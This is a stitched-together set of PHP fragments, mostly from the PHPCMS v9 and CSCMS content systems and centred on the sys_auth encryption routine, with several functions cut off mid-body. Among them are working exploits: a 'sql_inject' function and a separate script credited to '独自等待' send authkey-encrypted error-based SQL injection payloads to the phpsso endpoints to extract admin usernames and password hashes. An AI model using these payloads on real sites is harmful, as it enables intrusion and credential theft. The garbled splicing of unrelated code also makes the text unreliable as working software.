/**
* 构造函数
*/
public function __construct()
{
$this->db = pc_base::load_model('member_model');
pc_base::load_app_func('global');
/*获取系统配置*/
$this->settings = getcache('settings', 'admin');
$this->applist = getcache('applist', 'admin');
if (isset($_GET) && is_array($_GET) && count($_GET) > 0) {
foreach ($_GET as $k => $v) {
if (!in_array($k, array('m', 'c', 'a'))) {
$_POST[$k] = $v;
}
}
}
if (isset($_POST['appid'])) {
$this->appid = intval($_POST['appid']);
} else {
exit('0');
}
if (isset($_POST['data'])) {
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
if (!is_array($this->data)) {
exit('0');
}
} else {
exit('0');
}
if (isset($GLOBALS['HTTP_RAW_POST_DATA'])) {
$this->data['avatardata'] = $GLOBALS['HTTP_RAW_POST_DATA'];
if ($this->applist[$this->appid]['authkey'] != $this->data['ps_auth_key']) {
exit('0');
}
}
}
public static function get_cookie($var, $default = '')
{
$var = CS_Cookie_Prefix . $var;
$value = isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'D', $var . CS_Encryption_Key) : $default;
$value = safe_replace($value);
return $value;
}
/**
* 发送数据
* @param $action 操作
* @param $data 数据
*/
function ps_send($url, $data = null, $key)
{
$s = $sep = '';
foreach ($data as $k => $v) {
if (is_array($v)) {
$s2 = $sep2 = '';
foreach ($v as $k2 => $v2) {
if (is_array($v2)) {
$s3 = $sep3 = '';
foreach ($v2 as $k3 => $v3) {
$k3 = $k3;
$s3 .= "{$sep3}{$k}[{$k2}][{$k3}]=" . ps_stripslashes($v3);
$sep3 = '&';
}
$s .= $sep2 . $s3;
} else {
$s2 .= "{$sep2}{$k}[{$k2}]=" . ps_stripslashes($v2);
$sep2 = '&';
$s .= $sep . $s2;
}
}
} else {
$s .= "{$sep}{$k}=" . ps_stripslashes($v);
}
$sep = '&';
}
$auth_s = 'code=' . urlencode(sys_auth($s, 'ENCODE', $key));
return ps_post($url, 500000, $auth_s);
}
/**
* 判断用户是否已经登陆
*/
public final function check_member()
{
$phpcms_auth = param::get_cookie('auth');
if (ROUTE_M == 'member' && ROUTE_C == 'index' && in_array(ROUTE_A, array('login', 'register', 'mini', 'send_newmail'))) {
if ($phpcms_auth && ROUTE_A != 'mini') {
showmessage(L('login_success', '', 'member'), 'index.php?m=member&c=index');
} else {
return true;
}
} else {
//判断是否存在auth cookie
if ($phpcms_auth) {
$auth_key = $auth_key = md5(pc_base::load_config('system', 'auth_key') . $_SERVER['HTTP_USER_AGENT']);
list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key));
//验证用户,获取用户信息
$this->memberinfo = $this->db->get_one(array('userid' => $userid));
//获取用户模型信息
$this->db->set_model($this->memberinfo['modelid']);
$this->_member_modelinfo = $this->db->get_one(array('userid' => $userid));
$this->_member_modelinfo = $this->_member_modelinfo ? $this->_member_modelinfo : array();
$this->db->set_model();
if (is_array($this->memberinfo)) {
$this->memberinfo = array_merge($this->memberinfo, $this->_member_modelinfo);
}
if ($this->memberinfo && $this->memberinfo['password'] === $password) {
if (!defined('SITEID')) {
define('SITEID', $this->memberinfo['siteid']);
}
if ($this->memberinfo['groupid'] == 1) {
param::set_cookie('auth', '');
param::set_cookie('_userid', '');
param::set_cookie('_username', '');
param::set_cookie('_groupid', '');
showmessage(L('userid_banned_by_administrator', '', 'member'), 'index.php?m=member&c=index&a=login');
} elseif ($this->memberinfo['groupid'] == 7) {
param::set_cookie('auth', '');
param::set_cookie('_userid', '');
param::set_cookie('_groupid', '');
//设置当前登录待验证账号COOKIE,为重发邮件所用
param::set_cookie('_regusername', $this->memberinfo['username']);
param::set_cookie('_reguserid', $this->memberinfo['userid']);
param::set_cookie('_reguseruid', $this->memberinfo['phpssouid']);
param::set_cookie('email', $this->memberinfo['email']);
showmessage(L('need_emial_authentication', '', 'member'), 'index.php?m=member&c=index&a=register&t=2');
}
} else {
param::set_cookie('auth', '');
param::set_cookie('_userid', '');
param::set_cookie('_username', '');
param::set_cookie('_groupid', '');
}
unset($userid, $password, $phpcms_auth, $auth_key);
} else {
$forward = isset($_GET['forward']) ? urlencode($_GET['forward']) : urlencode(get_url());
showmessage(L('please_login', '', 'member'), 'index.php?m=member&c=index&a=login&forward=' . $forward);
}
}
}
public function init()
{
$allow_visitor = htmlspecialchars($_GET['allow_visitor']);
$auth = sys_auth($allow_visitor, 'DECODE');
if (strpos($auth, '|') === false) {
showmessage(L('illegal_operation'));
}
$auth_str = explode('|', $auth);
$flag = $auth_str[0];
if (!preg_match('/^([0-9]+)|([0-9]+)/', $flag)) {
showmessage(L('illegal_operation'));
}
$readpoint = intval($auth_str[1]);
$paytype = intval($auth_str[2]);
$http_referer = urldecode($_GET['http_referer']);
if (!$readpoint) {
showmessage(L('illegal_operation'));
}
pc_base::load_app_class('spend', 'pay', 0);
$flag_arr = explode('_', $flag);
$catid = $flag_arr[0];
$siteids = getcache('category_content', 'commons');
$siteid = $siteids[$catid];
$CATEGORYS = getcache('category_content_' . $siteid, 'commons');
if (isset($CATEGORYS[$catid])) {
$setting = string2array($CATEGORYS[$catid]['setting']);
$repeatchargedays = intval($setting['repeatchargedays']);
if ($repeatchargedays) {
$fromtime = SYS_TIME - 86400 * $repeatchargedays;
$r = spend::spend_time($this->userid, $fromtime, $flag);
if ($r) {
showmessage(L('have_pay'), $http_referer, 1000);
}
}
}
if ($paytype) {
if (spend::amount($readpoint, L('msg_readpoint'), $this->userid, $this->username, '', '', $flag) == false) {
$msg = spend::get_msg();
$http_referer = APP_PATH . 'index.php?m=pay&c=deposit&a=pay';
} else {
$msg = L('readpoint_pay', array('readpoint' => $readpoint));
}
} else {
if (spend::point($readpoint, L('msg_readpoint'), $this->userid, $this->username, '', '', $flag) == false) {
$msg = spend::get_msg();
$http_referer = APP_PATH . 'index.php?m=pay&c=deposit&a=pay';
} else {
$msg = L('readpoint_pay_point', array('readpoint' => $readpoint));
}
}
showmessage($msg, $http_referer, 3000);
}
function __construct()
{
pc_base::load_app_func('global');
$this->upload_url = pc_base::load_config('system', 'upload_url');
$this->upload_path = pc_base::load_config('system', 'upload_path');
$this->imgext = array('jpg', 'gif', 'png', 'bmp', 'jpeg');
$this->userid = $_SESSION['userid'] ? $_SESSION['userid'] : (param::get_cookie('_userid') ? param::get_cookie('_userid') : sys_auth($_POST['userid_flash'], 'DECODE'));
$this->isadmin = 1;
$this->groupid = param::get_cookie('_groupid') ? param::get_cookie('_groupid') : 8;
//判断是否登录
if (empty($this->userid)) {
//showmessage(L('please_login','','member'));
}
}
/**
* 构造函数
*/
public function __construct()
{
$this->db = pc_base::load_model('member_model');
pc_base::load_app_func('global');
/*获取系统配置*/
$this->settings = getcache('settings', 'admin');
$this->applist = getcache('applist', 'admin');
if (isset($_GET) && is_array($_GET) && count($_GET) > 0) {
foreach ($_GET as $k => $v) {
if (!in_array($k, array('m', 'c', 'a'))) {
$_POST[$k] = $v;
}
}
}
if (isset($_POST['appid'])) {
$this->appid = intval($_POST['appid']);
} else {
exit('0');
}
if (isset($_POST['data'])) {
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
if (empty($this->data) || !is_array($this->data)) {
exit('0');
}
if (!get_magic_quotes_gpc()) {
$this->data = new_addslashes($this->data);
}
if (isset($this->data['username']) && $this->data['username'] != '' && is_username($this->data['username']) == false) {
exit('-5');
}
if (isset($this->data['email']) && $this->data['username'] != '' && is_email($this->data['email']) == false) {
exit('-5');
}
if (isset($this->data['password']) && $this->data['password'] != '' && (is_password($this->data['password']) == false || is_badword($this->data['password']))) {
exit('-5');
}
if (isset($this->data['newpassword']) && $this->data['newpassword'] != '' && (is_password($this->data['newpassword']) == false || is_badword($this->data['newpassword']))) {
exit('-5');
}
} else {
exit('0');
}
if (isset($GLOBALS['HTTP_RAW_POST_DATA'])) {
$this->data['avatardata'] = $GLOBALS['HTTP_RAW_POST_DATA'];
//if($this->applist[$this->appid]['authkey'] != $this->data['ps_auth_key']) {
// exit('0');
//}
}
}
function sql_inject()
{
global $phpcmsv9;
$limit = 10;
//默认显示多少个管理员账号
$admin = array();
$key = authkey();
for ($i = 0; $i < $limit; $i++) {
$code = sys_auth("action=synlogin&uid=1' and(select 1 from(select count(*),concat((select (select (\n SELECT distinct concat(0x7e,username,0x3a,password,0x3a,encrypt,0x7e)FROM v9_admin limit {$i},1)) from\n information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#", 'ENCODE', $key);
$target = $phpcmsv9 . '/api.php?op=phpsso&code=' . $code;
#$target = $phpcmsv9 . 'phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=' . $code;
$content = get_data($target);
if (preg_match('/~(.+?)~1/', $content, $match)) {
$admin[] = $match[1];
} else {
break;
}
}
return $admin;
}
public function download() {
$a_k = trim($_GET['a_k']);
$pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT']);
$a_k = sys_auth($a_k, 'DECODE', $pc_auth_key);
if(empty($a_k)) showmessage(L('illegal_parameters'));
unset($i,$m,$f,$t,$ip);
parse_str($a_k);
if(isset($i)) $downid = intval($i);
if(!isset($m)) showmessage(L('illegal_parameters'));
if(!isset($modelid)) showmessage(L('illegal_parameters'));
if(empty($f)) showmessage(L('url_invalid'));
if(!$i || $m<0) showmessage(L('illegal_parameters'));
if(!isset($t)) showmessage(L('illegal_parameters'));
if(!isset($ip)) showmessage(L('illegal_parameters'));
$starttime = intval($t);
if(preg_match('/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i',$f) || strpos($f, ":\\")!==FALSE || strpos($f,'..')!==FALSE) showmessage(L('url_error'));
$fileurl = trim($f);
if(!$downid || empty($fileurl) || !preg_match("/[0-9]{10}/", $starttime) || !preg_match("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/", $ip) || $ip != ip()) showmessage(L('illegal_parameters'));
$endtime = SYS_TIME - $starttime;
if($endtime > 3600) showmessage(L('url_invalid'));
if($m) $fileurl = trim($s).trim($fileurl);
//远程文件
if(strpos($fileurl, ':/') && (strpos($fileurl, pc_base::load_config('system','upload_url')) === false)) {
header("Location: $fileurl");
} else {
if($d == 0) {
header("Location: ".$fileurl);
} else {
$fileurl = str_replace(array(pc_base::load_config('system','upload_url'),'/'), array(pc_base::load_config('system','upload_path'),DIRECTORY_SEPARATOR), $fileurl);
$filename = basename($fileurl);
//处理中文文件
if(preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl)) {
$filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl));
$filename = urldecode(basename($filename));
}
$ext = fileext($filename);
$filename = date('Ymd_his').random(3).'.'.$ext;
file_down($fileurl, $filename);
}
}
}
$title = $_GET['title'];
$title = addslashes(urldecode($title));
if (CHARSET != 'utf-8') {
$title = iconv('utf-8', CHARSET, $title);
$title = addslashes($title);
}
$title = htmlspecialchars($title);
$url = safe_replace(addslashes(urldecode($_GET['url'])));
$url = trim_script($url);
}
$_GET['callback'] = safe_replace($_GET['callback']);
//判断是否登录
$phpcms_auth = param::get_cookie('auth');
if ($phpcms_auth) {
$auth_key = md5(pc_base::load_config('system', 'auth_key') . $_SERVER['HTTP_USER_AGENT']);
list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key));
if ($userid > 0) {
} else {
exit(trim_script($_GET['callback']) . '(' . json_encode(array('status' => -1)) . ')');
}
} else {
exit(trim_script($_GET['callback']) . '(' . json_encode(array('status' => -1)) . ')');
}
$favorite_db = pc_base::load_model('favorite_model');
$data = array('title' => $title, 'url' => $url, 'adddate' => SYS_TIME, 'userid' => $userid);
//根据url判断是否已经收藏过。
$is_exists = $favorite_db->get_one(array('url' => $url, 'userid' => $userid));
if (!$is_exists) {
$favorite_db->insert($data);
}
exit(trim_script($_GET['callback']) . '(' . json_encode(array('status' => 1)) . ')');
/**
* 同步退出
* @return string javascript用户同步退出js
*/
public function synlogout() {
if($this->applist[$this->appid]['synlogin']) {
$res = '';
//ucenter登陆部份
if ($this->config['ucuse']) {
pc_base::load_config('uc_config');
require_once PHPCMS_PATH.'api/uc_client/client.php';
$res .= uc_user_synlogout();
}
foreach($this->applist as $v) {
if (!$v['synlogin']) continue;
if($v['appid'] != $this->appid) {
$tmp_s = strstr($v['url'].$v['apifilename'], '?') ? '&' : '?';
$res .= '<script type="text/javascript" src="'.$v['url'].$v['apifilename'].$tmp_s.'time='.SYS_TIME.'&code='.urlencode(sys_auth('action=synlogout&time='.SYS_TIME, 'ENCODE', $v['authkey'])).'" reload="1"></script>';
}
}
exit($res);
} else {
exit;
}
}
public function show()
{
$catid = intval($_GET['catid']);
$id = intval($_GET['id']);
if (!$catid || !$id) {
showmessage(L('information_does_not_exist'), 'blank');
}
$page = intval($_GET['page']);
$page = max($page, 1);
$siteids = getcache('category_content', 'commons');
$siteid = $siteids[$catid];
$CATEGORYS = getcache('category_content_' . $siteid, 'commons');
if (!isset($CATEGORYS[$catid]) || $CATEGORYS[$catid]['type'] != 0) {
showmessage(L('information_does_not_exist'), 'blank');
}
$this->category = $CAT = $CATEGORYS[$catid];
$this->category_setting = $CAT['setting'] = string2array($this->category['setting']);
$siteid = $GLOBALS['siteid'] = $CAT['siteid'];
$MODEL = getcache('model', 'commons');
$modelid = $CAT['modelid'];
$tablename = $this->db->table_name = $this->db->db_tablepre . $MODEL[$modelid]['tablename'];
$r = $this->db->get_one(array('id' => $id));
if (!$r || $r['status'] != 99) {
showmessage(L('info_does_not_exists'), 'blank');
}
$this->db->table_name = $tablename . '_data';
$r2 = $this->db->get_one(array('id' => $id));
$rs = $r2 ? array_merge($r, $r2) : $r;
//再次重新赋值,以数据库为准
$catid = $CATEGORYS[$r['catid']]['catid'];
$modelid = $CATEGORYS[$catid]['modelid'];
require_once CACHE_MODEL_PATH . 'content_output.class.php';
$content_output = new content_output($modelid, $catid, $CATEGORYS);
$data = $content_output->get($rs);
//print_r($data);
extract($data);
//检查文章会员组权限
if ($groupids_view && is_array($groupids_view)) {
$_groupid = param::get_cookie('_groupid');
$_groupid = intval($_groupid);
if (!$_groupid) {
$forward = urlencode(get_url());
showmessage(L('login_website'), APP_PATH . 'index.php?m=member&c=index&a=login&forward=' . $forward);
}
if (!in_array($_groupid, $groupids_view)) {
showmessage(L('no_priv'));
}
} else {
//根据栏目访问权限判断权限
$_priv_data = $this->_category_priv($catid);
if ($_priv_data == '-1') {
$forward = urlencode(get_url());
showmessage(L('login_website'), APP_PATH . 'index.php?m=member&c=index&a=login&forward=' . $forward);
} elseif ($_priv_data == '-2') {
showmessage(L('no_priv'));
}
}
if (module_exists('comment')) {
$allow_comment = isset($allow_comment) ? $allow_comment : 1;
} else {
$allow_comment = 0;
}
//阅读收费 类型
$paytype = $rs['paytype'];
$readpoint = $rs['readpoint'];
$allow_visitor = 1;
if ($readpoint || $this->category_setting['defaultchargepoint']) {
if (!$readpoint) {
$readpoint = $this->category_setting['defaultchargepoint'];
$paytype = $this->category_setting['paytype'];
}
//检查是否支付过
$allow_visitor = self::_check_payment($catid . '_' . $id, $paytype);
if (!$allow_visitor) {
$http_referer = urlencode(get_url());
$allow_visitor = sys_auth($catid . '_' . $id . '|' . $readpoint . '|' . $paytype) . '&http_referer=' . $http_referer;
} else {
$allow_visitor = 1;
}
}
//最顶级栏目ID
$arrparentid = explode(',', $CAT['arrparentid']);
$top_parentid = $arrparentid[1] ? $arrparentid[1] : $catid;
$brother_cats = subcat($top_parentid);
//顶级栏目子栏目集合,03月10日
$template = $template ? $template : $CAT['setting']['show_template'];
if (!$template) {
$template = 'show';
}
//SEO
$seo_keywords = '';
if (!empty($keywords)) {
$seo_keywords = implode(',', $keywords);
}
$_cateinfo = M("category")->get_one("catid=" . $catid);
$sys_title = M("safe_system")->get_one("id=1");
$SEO = array('site_title' => $sys_title['attr_value'], 'keyword' => empty($seo_keywords) ? $sys_title['attr_value'] : $seo_keywords, "description" => $sys_title['attr_value'], 'title' => $title . " - " . $_cateinfo['catname'] . " - ");
define('STYLE', $CAT['setting']['template_list']);
if (isset($rs['paginationtype'])) {
$paginationtype = $rs['paginationtype'];
$maxcharperpage = $rs['maxcharperpage'];
}
$pages = $titles = '';
if ($rs['paginationtype'] == 1) {
//自动分页
if ($maxcharperpage < 10) {
$maxcharperpage = 500;
}
$contentpage = pc_base::load_app_class('contentpage');
$content = $contentpage->get_data($content, $maxcharperpage);
}
if ($rs['paginationtype'] != 0) {
//手动分页
$CONTENT_POS = strpos($content, '[page]');
if ($CONTENT_POS !== false) {
$this->url = pc_base::load_app_class('url', 'content');
$contents = array_filter(explode('[page]', $content));
$pagenumber = count($contents);
if (strpos($content, '[/page]') !== false && $CONTENT_POS < 7) {
$pagenumber--;
}
for ($i = 1; $i <= $pagenumber; $i++) {
$pageurls[$i] = $this->url->show($id, $i, $catid, $rs['inputtime']);
}
$END_POS = strpos($content, '[/page]');
if ($END_POS !== false) {
if ($CONTENT_POS > 7) {
$content = '[page]' . $title . '[/page]' . $content;
}
if (preg_match_all("|\\[page\\](.*)\\[/page\\]|U", $content, $m, PREG_PATTERN_ORDER)) {
foreach ($m[1] as $k => $v) {
$p = $k + 1;
$titles[$p]['title'] = strip_tags($v);
$titles[$p]['url'] = $pageurls[$p][0];
}
}
}
//当不存在 [/page]时,则使用下面分页
$pages = content_pages($pagenumber, $page, $pageurls);
//判断[page]出现的位置是否在第一位
if ($CONTENT_POS < 7) {
$content = $contents[$page];
} else {
if ($page == 1 && !empty($titles)) {
$content = $title . '[/page]' . $contents[$page - 1];
} else {
$content = $contents[$page - 1];
}
}
if ($titles) {
list($title, $content) = explode('[/page]', $content);
$content = trim($content);
if (strpos($content, '</p>') === 0) {
$content = '<p>' . $content;
}
if (stripos($content, '<p>') === 0) {
$content = $content . '</p>';
}
}
}
}
$this->db->table_name = $tablename;
//上一页
$previous_page = $this->db->get_one("`catid` = '{$catid}' AND `id`<'{$id}' AND `status`=99", '*', 'id DESC');
//下一页
$next_page = $this->db->get_one("`catid`= '{$catid}' AND `id`>'{$id}' AND `status`=99");
if (empty($previous_page)) {
$previous_page = array('title' => L('first_page'), 'thumb' => IMG_PATH . 'nopic_small.gif', 'url' => 'javascript:alert(\'' . L('first_page') . '\');');
}
if (empty($next_page)) {
$next_page = array('title' => L('last_page'), 'thumb' => IMG_PATH . 'nopic_small.gif', 'url' => 'javascript:alert(\'' . L('last_page') . '\');');
}
include template('content', $template);
}
public function synlogout($get, $post)
{
$res = '';
foreach ($this->applist as $v) {
if ($v['appid'] != $this->appid) {
$f = strstr($v['url'] . $v['apifilename'], '?') ? '&' : '?';
$res .= '<script type="text/javascript" src="' . $v['url'] . $v['apifilename'] . $f . 'time=' . SYS_TIME . '&code=' . urlencode(sys_auth('action=synlogout&time=' . SYS_TIME, 'ENCODE', $v['authkey'])) . '" reload="1"></script>';
}
}
header("Content-type: text/javascript");
return format_js($res);
}
/**
* 找回密码
* 新增加短信找回方式
*/
public function public_forget_password()
{
$email_config = getcache('common', 'commons');
//SMTP MAIL 二种发送模式
if ($email_config['mail_type'] == '1') {
if (empty($email_config['mail_user']) || empty($email_config['mail_password'])) {
showmessage(L('email_config_empty'), HTTP_REFERER);
}
}
$this->_session_start();
$member_setting = getcache('member_setting');
if (isset($_POST['dosubmit'])) {
if ($_SESSION['code'] != strtolower($_POST['code'])) {
showmessage(L('code_error'), HTTP_REFERER);
}
$memberinfo = $this->db->get_one(array('email' => $_POST['email']));
if (!empty($memberinfo['email'])) {
$email = $memberinfo['email'];
} else {
showmessage(L('email_error'), HTTP_REFERER);
}
pc_base::load_sys_func('mail');
$code = sys_auth($memberinfo['userid'] . "\t" . microtime(true), 'ENCODE', get_auth_key('email'));
$url = APP_PATH . "index.php?m=member&c=index&a=public_forget_password&code={$code}";
$message = $member_setting['forgetpassword'];
$message = str_replace(array('{click}', '{url}'), array('<a href="' . $url . '">' . L('please_click') . '</a>', $url), $message);
//获取站点名称
$sitelist = getcache('sitelist', 'commons');
if (isset($sitelist[$memberinfo['siteid']]['name'])) {
$sitename = $sitelist[$memberinfo['siteid']]['name'];
} else {
$sitename = 'PHPCMS_V9_MAIL';
}
sendmail($email, L('forgetpassword'), $message, '', '', $sitename);
showmessage(L('operation_success'), 'index.php?m=member&c=index&a=login');
} elseif ($_GET['code']) {
$hour = date('y-m-d h', SYS_TIME);
$code = sys_auth($_GET['code'], 'DECODE', get_auth_key('email'));
$code = explode("\t", $code);
if (is_array($code) && is_numeric($code[0]) && date('y-m-d h', SYS_TIME) == date('y-m-d h', $code[1])) {
$memberinfo = $this->db->get_one(array('userid' => $code[0]));
if (empty($memberinfo['phpssouid'])) {
showmessage(L('operation_failure'), 'index.php?m=member&c=index&a=login');
}
$updateinfo = array();
$password = random(8, "23456789abcdefghkmnrstwxy");
$updateinfo['password'] = password($password, $memberinfo['encrypt']);
$this->db->update($updateinfo, array('userid' => $code[0]));
if (pc_base::load_config('system', 'phpsso')) {
//初始化phpsso
$this->_init_phpsso();
$this->client->ps_member_edit('', $email, '', $password, $memberinfo['phpssouid'], $memberinfo['encrypt']);
}
$email = $memberinfo['email'];
//获取站点名称
$sitelist = getcache('sitelist', 'commons');
if (isset($sitelist[$memberinfo['siteid']]['name'])) {
$sitename = $sitelist[$memberinfo['siteid']]['name'];
} else {
$sitename = 'PHPCMS_V9_MAIL';
}
pc_base::load_sys_func('mail');
sendmail($email, L('forgetpassword'), "New password:" . $password, '', '', $sitename);
showmessage(L('operation_success') . L('newpassword') . ':' . $password);
} else {
showmessage(L('operation_failure'), 'index.php?m=member&c=index&a=login');
}
} else {
$siteid = isset($_REQUEST['siteid']) && trim($_REQUEST['siteid']) ? intval($_REQUEST['siteid']) : 1;
$siteinfo = siteinfo($siteid);
include template('member', 'forget_password');
}
}
<?php
/**
* Created by 独自等待
* Date: 2015/7/17
* Time: 21:08
* Name: phpcmsv9_authkey_sql.php
* 独自等待博客:http://www.waitalone.cn/
*/
set_time_limit(0);
$wang_url = 'http://localhost/phpcmsv9';
//请修改这里为phpcmsv9网站地址
$auth_key = 'H9zUDnCVcNUvuk9EHIANYHfRvC2W5kAF';
//这里为phpcmsv9 authkey
$str = "uid=1" . stripslashes($_GET['id']);
$encode = sys_auth($str, 'ENCODE', $auth_key);
$content = file_get_contents($wang_url . "/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=" . $encode);
echo $content;
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0)
{
$key_length = 4;
$key = md5($key);
$fixedkey = hash('md5', $key);
$egiskeys = md5(substr($fixedkey, 16, 16));
$runtokey = $key_length ? $operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length) : '';
$keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
$string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
$i = 0;
$result = '';
$string_length = strlen($string);
for ($i = 0; $i < $string_length; $i++) {
function get_cookie($key)
{
$config = array();
$config = C('cookie');
$config['cookiepre'] = isset($config['cookiepre']) ? $config['cookiepre'] : '';
$val = isset($_COOKIE[$config['cookiepre'] . $key]) ? $_COOKIE[$config['cookiepre'] . $key] : '';
return sys_auth($val, 'DECODE');
}
/**
* swfupload上传附件
*/
public function swfupload()
{
$grouplist = getcache('grouplist', 'member');
if (isset($_POST['dosubmit'])) {
if ($_POST['swf_auth_key'] != md5(pc_base::load_config('system', 'auth_key') . $_POST['SWFUPLOADSESSID']) || $_POST['isadmin'] == 0 && !$grouplist[$_POST['groupid']]['allowattachment']) {
exit;
}
pc_base::load_sys_class('attachment', '', 0);
$attachment = new attachment($_POST['module'], $_POST['catid'], $_POST['siteid']);
$attachment->set_userid($_POST['userid']);
$siteid = get_siteid();
$site_setting = get_site_setting($siteid);
$site_allowext = $site_setting['upload_allowext'];
$aids = $attachment->upload('Filedata', $site_allowext, '', '', array($_POST['thumb_width'], $_POST['thumb_height']), $_POST['watermark_enable']);
if ($aids[0]) {
$filename = strtolower(CHARSET) != 'utf-8' ? iconv('gbk', 'utf-8', $attachment->uploadedfiles[0]['filename']) : $attachment->uploadedfiles[0]['filename'];
if ($attachment->uploadedfiles[0]['isimage']) {
echo $aids[0] . ',' . $this->upload_url . $attachment->uploadedfiles[0]['filepath'] . ',' . $attachment->uploadedfiles[0]['isimage'] . ',' . $filename;
} else {
$fileext = $attachment->uploadedfiles[0]['fileext'];
if ($fileext == 'zip' || $fileext == 'rar') {
$fileext = 'rar';
} elseif ($fileext == 'doc' || $fileext == 'docx') {
$fileext = 'doc';
} elseif ($fileext == 'xls' || $fileext == 'xlsx') {
$fileext = 'xls';
} elseif ($fileext == 'ppt' || $fileext == 'pptx') {
$fileext = 'ppt';
} elseif ($fileext == 'flv' || $fileext == 'swf' || $fileext == 'rm' || $fileext == 'rmvb') {
$fileext = 'flv';
} else {
$fileext = 'do';
}
echo $aids[0] . ',' . $this->upload_url . $attachment->uploadedfiles[0]['filepath'] . ',' . $fileext . ',' . $filename;
}
exit;
} else {
echo '0,' . $attachment->error();
exit;
}
} else {
if ($this->isadmin == 0 && !$grouplist[$this->groupid]['allowattachment']) {
showmessage(L('att_no_permission'));
}
$args = $_GET['args'];
$authkey = $_GET['authkey'];
if (upload_key($args) != $authkey) {
showmessage(L('attachment_parameter_error'));
}
extract(getswfinit($_GET['args']));
$siteid = $this->get_siteid();
$site_setting = get_site_setting($siteid);
$file_size_limit = sizecount($site_setting['upload_maxsize'] * 1024);
$att_not_used = param::get_cookie('att_json');
if (empty($att_not_used) || !isset($att_not_used)) {
$tab_status = ' class="on"';
}
if (!empty($att_not_used)) {
$div_status = ' hidden';
}
//获取临时未处理文件列表
$att = $this->att_not_used();
$userid_flash = sys_auth($this->userid, 'ENCODE');
include $this->admin_tpl('swfupload');
}
}
public function get_templates($dir = NULL, $plubs = 0, $skins = NULL, $ulog = 0)
{
if (!defined('IS_ADMIN') && strpos(REQUEST_URI, 'index.php/install/') === FALSE && !file_exists(FCPATH . 'packs/install/plub_install.lock')) {
msg_txt(L('plub_no_instal'), Web_Path . 'admin.php');
}
if (!defined('PLUBPATH') && $plubs == 0) {
//系统默认视图路径
$path = str_replace("\\", "/", CSCMS);
if (!$dir) {
$dirs = 'tpl/skins/' . Web_Skins;
} else {
if ($dir == 'user') {
$dirs = 'tpl/' . $dir . '/' . User_Skins;
//会员中心默认视图
} elseif ($dir == 'home') {
if (!empty($skins)) {
$dirs = 'tpl/' . $dir . '/' . $skins;
//会员空间默认视图
} else {
$dirs = 'tpl/' . $dir . '/' . Home_Skins;
//会员空间默认视图
}
} else {
$dirs = 'tpl/' . $dir . '/';
//系统后台视图
}
}
if (defined('MOBILE') && Mobile_Is == 1) {
//手机门户视图
if ($dir == 'user') {
$dirs = 'tpl/mobile/' . Mobile_Skins . 'user/';
} elseif ($dir == 'home') {
$dirs = 'tpl/mobile/' . Mobile_Skins . 'home/';
} elseif ($dir != 'admin') {
$dirs = 'tpl/mobile/' . Mobile_Skins;
}
}
} else {
//版块视图路径
$path = str_replace("\\", "/", APPPATH);
$dir_file = APPPATH . 'config/site.php';
if ($plubs == 1 && !defined('PLUBPATH')) {
define('PLUBPATH', $dir);
$path = FCPATH . 'plugins/' . $dir . '/';
$dir_file = FCPATH . 'plugins/' . $dir . '/config/site.php';
}
$ak = getzd('plugins', 'ak', PLUBPATH, 'dir');
if (empty($ak)) {
msg_txt(vsprintf(L('plub_key_err1'), array(PLUBPATH)), Web_Path);
}
$arrs = unarraystring(sys_auth($ak, 'D'));
if ($arrs == '' || empty($arrs['md5']) || md5(PLUBPATH . $arrs['key'] . host_ym(1)) != $arrs['md5']) {
msg_txt(vsprintf(L('plub_key_err2'), array(PLUBPATH)), Web_Path);
}
$dirs = 'tpl/skins/default/';
if (is_file($dir_file)) {
$plub = (require $dir_file);
if (is_array($plub)) {
//后台视图
if (defined('IS_ADMIN') && $plubs < 2) {
$dirs = 'tpl/admin/';
//手机视图
} elseif (!defined('IS_ADMIN') && defined('MOBILE') && $plub['Mobile_Is'] == 1) {
$dirs = 'tpl/mobile/' . $plub['Mobile_Dir'];
if (defined('HOMEPATH')) {
$dirs .= 'home/';
}
if (defined('USERPATH')) {
$dirs .= 'user/';
}
//前台视图
} else {
if (defined('HOMEPATH')) {
if ($ulog == 1) {
$path = str_replace("\\", "/", CSCMS);
}
if (!empty($skins)) {
$dirs = 'tpl/home/' . $skins;
} else {
$dirs = 'tpl/home/' . Home_Skins;
}
} elseif (defined('USERPATH')) {
$dirs = 'tpl/user/' . $plub['User_Dir'];
} else {
$dirs = 'tpl/skins/' . $plub['Skins_Dir'];
}
}
}
}
}
if (substr($dirs, -1) != '/') {
$dirs .= '/';
}
$this->_ci_view_paths = array($path . $dirs => TRUE);
}
/**
* 获取通过 set_cookie 设置的 cookie 变量
* @param string $var 变量名
* @param string $default 默认值
* @return mixed 成功则返回cookie 值,否则返回 false
*/
public static function get_cookie($var, $default = '')
{
$var = pc_base::load_config('system', 'cookie_pre') . $var;
$value = isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DECODE') : $default;
if (in_array($var, array('_userid', 'userid', 'siteid', '_groupid', '_roleid'))) {
$value = intval($value);
} elseif (in_array($var, array('_username', 'username', '_nickname', 'admin_username', 'sys_lang'))) {
// site_model auth
$value = safe_replace($value);
}
return $value;
}
